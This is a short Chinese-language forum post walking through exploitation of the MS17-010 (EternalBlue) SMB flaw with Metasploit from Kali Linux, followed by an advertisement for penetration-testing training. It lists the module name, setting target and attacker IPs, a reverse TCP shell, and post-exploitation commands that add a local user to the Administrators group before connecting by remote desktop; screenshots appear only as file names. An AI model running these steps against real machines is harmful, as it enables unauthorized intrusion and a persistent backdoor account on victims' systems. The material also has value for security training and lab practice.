(三)使用metasploit进行ms17_010漏洞利用

[复制链接]
发表于 2025-11-5 20:29:49 | 显示全部楼层 |阅读模式
1、在kali里面打开metasploit漏洞利用框架


2、搜索ms17-010漏洞利用模块


search ms17-010

截图202511051229445369.png

3、使用利用模块

exploit/windows/smb/ms17_010_eternalblue

截图202511051248024703.png

4、查看配置项 show options
截图202511051248241594.png


5、设置 靶机IP地址

截图202511051250266967.png

6、设置以TCP反弹一个shell回来

截图202511051250396668.png

7、设置攻击者IP地址

截图202511051250545927.png

8、实施攻击 exploit

截图202511051251183415.png

9、可以创建用户 net user xxxx 1234 /add(xxxx用户名 1234密码)

截图202511051252328175.png

10、net localgroup administrators xxxx /add (将用户添加到管理员组)

截图202511051252463236.png

11、重新打开一个终端 rdesktop+IP (IP为被攻击的操作系统IP)

截图202511051253008621.png

必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:17 , Processed in 0.084913 second(s), 27 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表